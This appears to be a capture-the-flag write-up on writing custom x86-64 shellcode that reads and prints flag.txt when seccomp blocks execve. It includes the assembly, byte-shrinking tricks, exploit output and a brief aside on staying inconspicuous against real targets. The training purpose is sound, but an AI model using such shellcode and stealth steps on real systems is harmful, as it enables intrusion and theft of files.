This challenge is very similar to Leaked Shellcode, with one major difference. For this challenge, we'll practice writing our own shellcode for when Shellstorm doesn't have shellcode that does what we need.
First, we'll use Leaked Shellcode's exploit against this binary. When we run it:
[*] '/ironforge/chall'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX unknown - GNU_STACK missing
    PIE:        PIE enabled
    Stack:      Executable
    RWX:        Has RWX segments
    Stripped:   No
[+] Starting local process '/ironforge/chall': pid 94425
[*] buf: 0x7ffc92c37f40
[*] Switching to interactive mode
What do you want to write there?
Thank you!
[*] Got EOF while reading in interactive
$
[*] Interrupted
[*] Process '/ironforge/chall' stopped with exit code -31 (SIGSYS) (pid 94425)
We get SIGSYS. Using man 7 signal, we can see what this error means:
SIGSYS P2001 Core Bad system call (SVr4);
see also seccomp(2)
It points us to man 2 seccomp. seccomp uses SIGSYS to kill a process that makes a disallowed system call.
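The negative exit code in the output above is how the signal is reported: a process killed by signal N shows up with return code -N (here, -31). A minimal sketch of that decoding using only Python's standard library follows; the helper name describe_exit is made up for this example.

```python
import signal


def describe_exit(returncode):
    """Turn a process return code into a readable description.

    A negative return code means the process was killed by a signal
    whose number is the absolute value of the code.
    """
    if returncode < 0:
        return signal.Signals(-returncode).name
    return f"exit status {returncode}"


if __name__ == "__main__":
    # -31 is the code reported for the crashed challenge process.
    print(describe_exit(-31))
```

Signal numbers are platform-specific, so the name printed for -31 depends on the system the script runs on.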
We see via ldd (or the source code) that seccomp is used.
libseccomp.so.2 => /lib/x86_64-linux-gnu/libseccomp.so.2 (0x00007fd56a622000)
seccomp must be installed for this binary to run. This can be done with:
sudo apt-get install libseccomp-dev
seccomp allows certain system calls to be disabled. In this case, it disables execve and execveat, so our old exploit no longer works. We'll need to write our own.
First, we need to decide what the shellcode should do. Since we just need the contents of the flag.txt file, we can simply read it and print it. In C, we would do something like:
FILE *fp = fopen("flag.txt", "r");
fgets(buffer, sizeof(buffer), fp);
puts(buffer);
These are libc functions. We could find them inside libc and call them directly, but this is difficult: we would be subject to ASLR and would need to know the base address of libc. Instead, we can use system calls to do this. This would look something like:
int fd = open("flag.txt", O_RDONLY);
ssize_t n = read(fd, buffer, sizeof(buffer));
write(1, buffer, n); /* 1 is stdout */
Using the x64 syscall table, we can look up these system calls, their arguments, and their register values. x64 system calls use nearly the same register scheme as regular functions (the fourth argument goes in r10 instead of rcx), with the addition of rax being used for the system call number.
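As a quick reference for the rest of the walkthrough, the sketch below lists the x86-64 Linux numbers for the system calls used in this writeup, along with the argument registers in order. The register_plan helper is hypothetical; it only shows which register each value should end up in before the syscall instruction.

```python
# x86-64 Linux system call numbers used in this writeup.
SYSCALL_NUMBERS = {"read": 0, "write": 1, "open": 2, "close": 3, "exit": 60}

# Argument registers for system calls, first argument first.
ARG_REGISTERS = ("rdi", "rsi", "rdx", "r10", "r8", "r9")


def register_plan(name, *args):
    """Map a system call and its arguments onto registers."""
    if len(args) > len(ARG_REGISTERS):
        raise ValueError("a system call takes at most six arguments")
    plan = {"rax": SYSCALL_NUMBERS[name]}
    plan.update(zip(ARG_REGISTERS, args))
    return plan


if __name__ == "__main__":
    # open(pathname_on_stack, 0, 0)
    print(register_plan("open", "rsp", 0, 0))
```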
First, we must open the file. open has the following signature:
int open(const char *pathname, int flags);
We don't have our own memory to store data in, so we must use the stack. This becomes problematic because our instructions are also stored on the stack. Push too much and you may overwrite your own instructions. This is especially critical in smaller spaces.
open takes a char* for the pathname, meaning we need an address that points to flag.txt. Since it's not already in the binary, we must introduce it into the shellcode. We do this by pushing it onto the stack and saving rsp.
mov rbx, 0x7478742e67616c66
push 0x0
push rbx
mov rdi, rsp
Why push 0x0? The string needs a null terminator, and open will keep reading until it finds one. Since flag.txt is exactly 8 characters, it fills the whole register, so we need an extra instruction to push the terminator.
You can pretty easily write a script that converts a string into these push instructions using Python.
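One possible version of such a script is sketched below. The function name string_to_pushes and the choice of rbx as the scratch register are assumptions made for this example. It pads the string with null bytes to a multiple of 8 (always adding at least one terminator), then emits the 8-byte chunks last-to-first so the string reads forward from rsp.

```python
def string_to_pushes(s, scratch="rbx"):
    """Return NASM lines that place a null-terminated string on the stack."""
    data = s.encode()
    # Pad to a multiple of 8 bytes. A string that is already a multiple
    # of 8 long gets a full zero qword so it is still terminated.
    padded = data + b"\x00" * (8 - len(data) % 8)

    lines = []
    # The stack grows downward, so the last chunk is pushed first.
    for offset in range(len(padded) - 8, -1, -8):
        value = int.from_bytes(padded[offset:offset + 8], "little")
        if value == 0:
            lines.append("push 0x0")
        else:
            # push cannot take a 64-bit immediate, so go through a register.
            lines.append(f"mov {scratch}, {value:#018x}")
            lines.append(f"push {scratch}")
    return lines


if __name__ == "__main__":
    print("\n".join(string_to_pushes("flag.txt")))
```

After these instructions run, rsp points at the start of the string, so mov rdi, rsp loads it as the first argument.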
Then, we can load the other registers and call syscall:
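; open("flag.txt", 0, 0)
mov al, 0x2 ; sys_open; assumes the rest of rax is already zero
mov rbx, 0x7478742e67616c66 ; "flag.txt" in little-endian order
push 0x0 ; null terminator
push rbx
mov rdi, rsp ; pathname
xor rsi, rsi ; flags = O_RDONLY
xor rdx, rdx ; mode = 0
syscall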
We'll need to store the return of this (rax) because it contains the file descriptor of the open file. This is where Caller vs. Callee Registers comes into play: we need a register that the following system calls will not overwrite. The syscall instruction clobbers rcx and r11 and returns its result in rax, and we reload rdi, rsi, and rdx as arguments for every call. So, I chose r10 to secure my file descriptor.
mov r10, rax
Then, we need to read bytes from the flag. We aren't told its length, so we will do this in a loop. We'll read a few bytes, write a few bytes, then check if we're at the end.
First, establish the buffer we'll write to:
push qword 0x0
Then, label our loop:
.loop:
Next, we call read, which has the signature:
ssize_t read(int fd, void buf[.count], size_t count);
This is pretty simple to do:
; read(fd, rsp, 0x8)
mov rdi, r10
xor rax, rax
mov rsi, rsp
mov rdx, 0x8
syscall
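Then, we call write, using the return of read to decide the number of bytes to write.
; write(stdout, rsp, rax)
mov rdx, rax ; count = number of bytes read
mov rdi, 1 ; stdout
mov rax, 1 ; sys_write; rsi still points at the buffer
syscall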
Finally, we must check if we're done. We can compare the return of write to 0x8 to see if we wrote 0x8 bytes.
cmp rax, 0x8
jl .done
jmp .loop
.done doesn't need anything under it because at this point, we'll have our flag.
I said a few things during that explanation that are worthy of explaining further.
Why use r10 at all?
We need r10 because setting up the write system call overwrites rdi with the stdout file descriptor. Therefore, the flag.txt file descriptor must be stored elsewhere so we can reload it on each iteration.
Using the return of read as the length for write is not an obvious choice, and it required a bit of forethought. In the end, we need to compare the number of bytes read from the file descriptor (the return of read) to 0x8 (the intended read size). If we read fewer than this, we reached the end of the file.
If we chose to always write 0x8 bytes, write would always return 0x8 and our comparison would never work. Therefore, we use read's return to write that many bytes and use write's return to check if we're at the end.
Another way to do this is to move the check between the read and write calls. We would need to change the check to only check for read returning 0; otherwise, we'll miss a few bytes in the final write.
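To make the loop's termination logic easier to follow, here is the same control flow sketched in Python using the thin os wrappers around open, read, and write. The function name dump_file is made up for this example, and unlike the shellcode it closes the descriptor at the end. The length passed to write comes from read, and the value compared against the chunk size comes from write.

```python
import os

CHUNK = 8  # same size as the 8-byte stack buffer in the shellcode


def dump_file(path, out_fd=1):
    """Copy a file to out_fd in CHUNK-sized pieces, like the shellcode loop."""
    fd = os.open(path, os.O_RDONLY)
    while True:
        data = os.read(fd, CHUNK)         # returns at most CHUNK bytes
        written = os.write(out_fd, data)  # writes only what was read
        if written < CHUNK:               # short (or empty) chunk: end of file
            break
    os.close(fd)
```

Calling dump_file("flag.txt") prints the file to stdout. When the file length is an exact multiple of 8, the last iteration reads and writes zero bytes, which still ends the loop.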
In this scenario, we don't need to do anything in .done because we'll already have the flag. What we'll notice at the end, however, is that the program will crash. This is because it'll run out of valid instructions.
If we were attempting this against a real target and wanted to remain inconspicuous, we would do a few things depending on the situation:
Close the file descriptor:
mov rdi, r10
mov rax, 0x3 ; sys_close
syscall
Call sys_exit to exit the program:
xor rdi, rdi
mov rax, 0x3c ; sys_exit
syscall
However, if we stole execution and the program was expected to do more (such as a reactor loop), we would want to return execution. This might involve storing the instruction and stack pointers using a trampoline. Coming soon we'll have a course on shellcoding that will cover this in more depth.
First, we need to assemble the shellcode.
nasm -f bin -o sc.bin sc.asm
Then, we can read this file into our exploit:
with open("sc.bin", "rb") as f:
    sc = f.read()
This replaces our old sc. This challenge has a slightly larger buffer, so we'll adjust the ljust to 0x58 bytes.
When we run it:
[*] '/ironforge/chall'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX unknown - GNU_STACK missing
    PIE:        PIE enabled
    Stack:      Executable
    RWX:        Has RWX segments
    Stripped:   No
[+] Starting local process '/ironforge/chall': pid 128923
[*] buf: 0x7ffe9aea2be0
[*] Switching to interactive mode
What do you want to write there?
Thank you!
IFC{PL4C[*] Got EOF while reading in interactive
$
[*] Process '/ironforge/chall' stopped with exit code -11 (SIGSEGV) (pid 128923)
[*] Got EOF while sending in interactive
It started to work but died! What we'll notice is that our shellcode doesn't fit the buffer:
$ wc -c sc.bin
76 sc.bin
Our buffer was only 72 bytes big! We need to make the shellcode smaller.
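A size check in the exploit script would have caught this before the payload was sent. The sketch below is one way to do it; the helper name pad_shellcode is made up, the 72-byte limit and the 0x58 padding length are the numbers from this writeup, and the NOP pad byte is an assumption.

```python
NOP = b"\x90"  # assumed pad byte for this sketch


def pad_shellcode(sc, limit=72, total=0x58):
    """Refuse shellcode that exceeds the usable space, then pad it."""
    if len(sc) > limit:
        raise ValueError(f"shellcode is {len(sc)} bytes, limit is {limit}")
    return sc.ljust(total, NOP)
```

With the 76-byte sc.bin from above, this raises a ValueError instead of producing a payload that dies halfway through printing the flag.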
As discussed in Assembly Instructions, instructions have various lengths. Most notable is the Register Extension (REX) prefix, which adds a byte to 64-bit instructions. When applicable, we'll attempt to shorten instructions.
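To see where the bytes go, the sketch below lists one valid encoding for a few of the instructions involved and checks each for a REX prefix. The byte strings were written out by hand for illustration; an assembler may pick a different but equivalent encoding, so always confirm real sizes with wc -c on the assembled output.

```python
# One valid x86-64 encoding per instruction (hand-written for illustration).
ENCODINGS = {
    "xor rax, rax": bytes.fromhex("4831c0"),
    "xor eax, eax": bytes.fromhex("31c0"),
    "mov rax, 1": bytes.fromhex("48c7c001000000"),
    "mov al, 1": bytes.fromhex("b001"),
    "mov rdi, r10": bytes.fromhex("4c89d7"),
    "mov edi, r10d": bytes.fromhex("4489d7"),
    "mov dil, 1": bytes.fromhex("40b701"),
}


def has_rex(encoding):
    """In 64-bit mode, a leading byte in 0x40..0x4f is a REX prefix.

    Checking only the first byte is enough here because none of these
    examples carries a legacy prefix in front of the REX byte.
    """
    return 0x40 <= encoding[0] <= 0x4F


if __name__ == "__main__":
    for text, enc in ENCODINGS.items():
        print(f"{text:<15} {len(enc)} bytes  REX={has_rex(enc)}")
```

Not every narrower register saves space: r10d and dil still need a REX prefix, so the biggest wins come from dropping 32-bit immediates in favor of 8-bit ones.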
We can shorten every rax-related instruction by zeroing out the register at the beginning and only ever using the least-significant byte. We can do this on two assumptions:
open returns a file descriptor, and read and write return a number <= 0x8.
Nothing else modifies rax. This can be a bold assumption but more often than not works in shellcoding. We wouldn't really do this if we were writing a program from scratch.
Then, we can change rdx in read and write to dl, knowing that we zeroed out rdx before the open syscall. We also know that rdi only holds one byte because it holds a file descriptor, so we can change that, too.
When shortening all the registers, our assembly becomes:
org 0
bits 64
section .text
global _start
_start:
; Clear rax
xor rax, rax
; open("flag.txt", 0, 0)
mov al, 0x2
mov rbx, 0x7478742e67616c66
push 0x0
push rbx
mov rdi, rsp
xor rsi, rsi
xor rdx, rdx
syscall
mov r10d, eax
; Buffer for writing
push qword 0x0
.loop:
; rax = read(fd, rsp, 0x8)
mov edi, r10d
mov al, 0
mov rsi, rsp
mov dl, 0x8
syscall
; write(stdout, rsp, rax)
mov dl, al
mov dil, 1
mov al, 1
syscall
cmp al, 0x8
jl .done
jmp .loop
.done:
This shortens our assembly to 61 bytes, which fits into the buffer.
If we run this, we get:
[*] '/ironforge/chall'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX unknown - GNU_STACK missing
    PIE:        PIE enabled
    Stack:      Executable
    RWX:        Has RWX segments
    Stripped:   No
[+] Starting local process '/ironforge/chall': pid 134755
[*] buf: 0x7ffcdf38c300
[*] Switching to interactive mode
What do you want to write there?
Thank you!
IFC{PL4C3H0LD3R_FL4G_H3R3!}
[*] Got EOF while reading in interactive
$
[*] Process '/ironforge/chall' stopped with exit code -11 (SIGSEGV) (pid 134755)
[*] Got EOF while sending in interactive
This yields our entire flag!